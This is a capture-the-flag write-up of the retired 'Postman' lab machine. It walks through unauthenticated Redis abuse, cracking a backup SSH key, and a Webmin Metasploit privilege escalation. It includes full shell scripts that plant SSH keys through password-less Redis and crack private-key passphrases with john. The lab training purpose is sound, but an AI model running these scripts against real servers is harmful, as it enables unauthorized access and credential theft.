Postman retired on the 14th of March 2020, so we can now publish its write-up freely.
Let's go ahead and run an nmap scan:
We see four open ports: SSH, HTTP, and two others. If we browse to the web server on port 10000 we get something like the following:
The other port (6379) is, as you can see, Redis.
If you search for a Redis exploit you will find this one on GitHub:
It simply creates a new key pair (public and private) and writes the public key into the redis user's authorized_keys file, which lives in the redis home directory: /var/lib/redis/.ssh/authorized_keys. This works because the Redis instance accepts commands without any password, so anyone can tell it where to write its dump file.
You will see something like this after running the script:
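The same key planting done by hand with redis-cli, as an added example (this is not the GitHub script from the write-up). It assumes the target IP is passed in $TARGET and that redis-cli and ssh-keygen are installed on the attacker machine; the redis home directory is the one named in the write-up.

```shell
#!/bin/sh
# Added example: plant an SSH public key through a Redis instance that
# needs no password. Not the GitHub script used in the write-up.
# Assumptions: target IP in $TARGET; redis-cli and ssh-keygen on PATH.
set -eu

REDIS_HOME=/var/lib/redis   # redis user's home on Postman (from the write-up)

# Redis writes the key inside a binary RDB dump, so surround it with blank
# lines: sshd skips the garbage lines and still parses the key line.
pad_key() {
    printf '\n\n%s\n\n' "$1"
}

# Store the padded key, then make the dump file land at ~/.ssh/authorized_keys.
# Plain Redis commands; no AUTH is sent because the box asks for none.
plant_key() {
    target=$1
    pubkey=$2
    pad_key "$pubkey" | redis-cli -h "$target" -x set ssh_key >/dev/null
    redis-cli -h "$target" config set dir "$REDIS_HOME/.ssh" >/dev/null
    redis-cli -h "$target" config set dbfilename authorized_keys >/dev/null
    redis-cli -h "$target" save >/dev/null
}

main() {
    keydir=$(mktemp -d)
    ssh-keygen -q -t rsa -b 2048 -N '' -f "$keydir/id_rsa"
    plant_key "$TARGET" "$(cat "$keydir/id_rsa.pub")"
    echo "Key planted. Log in with: ssh -i $keydir/id_rsa redis@$TARGET"
}

# Only touch the network when a target is given, so the helpers can be sourced safely.
if [ -n "${TARGET:-}" ]; then
    main
fi
```

Two things to keep in mind: `config set dir` only succeeds if the .ssh directory already exists on the target (it does on Postman), and the dump overwrites whatever was in authorized_keys, so on a real engagement restore `dir` and `dbfilename` afterwards.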
Boom!! We got a shell as the redis user. Now it's time to enumerate.
The first thing I did was look for any *.bak files:
We found a private SSH key. It is passphrase-protected, so let's copy it over and crack it with john.
You should end up with something like this. Now for John:
First we extract a crackable hash from the private key:
Then we brute-force it with John and rockyou.txt:
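The enumeration and cracking steps above as one script, added here as an example (these are not the write-up's own commands). `find_backups` is the target-side search; the rest runs on the attacker box once the key has been copied over. It assumes ssh2john (shipped with John the Ripper as ssh2john.py, usually on PATH as ssh2john) and john are installed, and that rockyou.txt sits at $WORDLIST, defaulting to Kali's path.

```shell
#!/bin/sh
# Added example, not from the write-up: find *.bak files, tell whether a
# private key is passphrase-protected, and crack it with John.
# Assumptions: ssh2john and john on PATH; wordlist path in $WORDLIST.
set -eu

WORDLIST=${WORDLIST:-/usr/share/wordlists/rockyou.txt}   # Kali default (assumed)

# *.bak files under a root, skipping the kernel pseudo-filesystems.
# Run this on the target; it only needs read access to the files.
find_backups() {
    root=${1:-/}
    find "$root" \( -path /proc -o -path /sys \) -prune -o \
        -type f -name '*.bak' -print 2>/dev/null
}

# PEM-format keys (like the one on Postman) advertise encryption in a
# "Proc-Type: 4,ENCRYPTED" header. New-format OpenSSH keys do not: for those,
# run `ssh-keygen -y -P '' -f key` and treat a failure as "encrypted".
key_is_encrypted() {
    grep -q 'ENCRYPTED' "$1"
}

# Convert the key to a john hash, run the wordlist, and print the passphrase.
# john --show prints "<file>:<passphrase>", so the passphrase is field 2 onward.
crack_key() {
    key=$1
    hash=$(mktemp)
    ssh2john "$key" > "$hash"
    john --wordlist="$WORDLIST" "$hash" >/dev/null 2>&1 || true
    john --show "$hash" | grep ':' | head -n 1 | cut -d: -f2-
    rm -f "$hash"
}

# Usage on the attacker box: sh crack_bak.sh /path/to/id_rsa.bak
if [ -n "${1:-}" ]; then
    if key_is_encrypted "$1"; then
        echo "[+] passphrase: $(crack_key "$1")"
    else
        echo "[*] $1 is not passphrase-protected; use it directly with ssh -i"
    fi
fi
```

If john reports nothing cracked, check `john --show` output by hand before assuming the wordlist failed: an unencrypted key yields no hash at all, and ssh2john prints an error instead of a hash line.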
Bingo, we have the passphrase "computer2008". You can get the username just by running "ls /home" in the redis SSH session: the user is Matt. Let's get that user flag.
In the redis SSH session, switch to Matt with su, using the passphrase we just cracked:
and then run "cat /home/Matt/user.txt".
For root, we must not forget that Webmin is listening on port 10000. We're going to use Metasploit for this part.
Let's fill in the module options:
There you go:
Now run "cat /root/root.txt" and you own the root flag.
I hope you liked this write-up; we will publish more in the future. Until then, see ya :D